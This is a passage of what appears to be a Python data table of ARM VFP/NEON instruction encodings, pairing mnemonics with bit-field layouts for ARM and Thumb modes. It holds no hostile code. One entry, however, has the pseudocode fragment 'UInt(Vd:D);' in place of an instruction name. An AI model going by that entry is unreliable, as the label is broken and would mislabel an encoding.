('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', cond, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOV<c> <Dm>,<Rt>,<Rt2>', cond, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
('VMRS<c> <Rt>,FPSCR', cond, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMSR<c> FPSCR,<Rt>', cond, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, op, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
('VNEG<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('UInt(Vd:D);', cond, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VPADAL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
('VPADD<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
('VPADD<c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VPADDL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
('VP<op><c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
('VP<op><c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('VPOP <list>', cond, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPOP <list>', cond, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VPUSH<c> <list>', cond, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPUSH<c> <list>', cond, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSQRT<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VSTM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
('VTRN<c>.<size>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
]
VFP_Thumb = [
('VABA<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 1, Vm),
('VABAL<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 1, N, 0, M, 0, Vm),
('VABD<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 0, Vm),
('VABDL<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 1, N, 0, M, 0, Vm),
('VABD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 0, Q, M, 0, Vm),
('VABS<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 1, Vm),
('VADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VADD<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VADD<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VADDL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 0, op, N, 0, M, 0, Vm),
('VAND<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VBIC<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VBIC<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('V<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op2, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VCEQ<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VCEQ<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCEQ<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 0, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 1, Vm),
('VCGE<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 1, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 0, Vm),
('VCGT<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 0, Q, M, 0, Vm),
('VCLE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 1, Q, M, 0, Vm),
('VCLS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 0, Q, M, 0, Vm),
('VCLT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 0, 0, Q, M, 0, Vm),
('VCLZ<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 1, Q, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 0, Vd, 1, 0, 1, sz, E, 1, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,#0.0', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 1, Vd, 1, 0, 1, sz, E, 1, (0), 0, (0), (0), (0), (0)),
('VCNT<c>.8 <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 0, Q, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 1, op2, Q, M, 0, Vm),
('VCVT{R}<c>.S32.F64 <Sd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 1, opc2, Vd, 1, 0, 1, sz, op, 1, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>,#<fbits>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 1, 1, op, 0, Q, M, 1, Vm),
('VCVT<c>.<Td>.F64 <Dd>,<Dd>,#<fbits>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 1, op, 1, U, Vd, 1, 0, 1, sf, sx, 1, i, 0, imm4),
('VCVT<c>.F64.F32 <Dd>,<Sm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 1, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VCVT<c>.F32.F16 <Qd>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 1, 1, op, 0, 0, M, 0, Vm),
('VCVT<y><c>.F32.F16 <Sd>,<Sm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 1, op, Vd, 1, 0, 1, (0), T, 1, M, 0, Vm),
('VDIV<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, imm4, Vd, 1, 1, 0, 0, 0, Q, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 0, 1, 1, 1, 0, 1, B, Q, 0, Vd, Rt, 1, 0, 1, 1, D, 0, E, 1, (0), (0), (0), (0)),
('VEOR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VEXT<c>.8 <Qd>,<Qn>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, imm4, N, Q, M, 0, Vm),
('VFM<y><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 0, N, Q, M, 1, Vm),
('VFM<y><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VFNM<y><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VH<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, op, 0, N, Q, M, 0, Vm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 0, size, T, a, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 1, size, T, a, Rm),
('VLD3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 0, size, T, a, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{ :<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 1, size, T, a, Rm),
('VLDM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('VLDR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 0, N, Q, M, op, Vm),
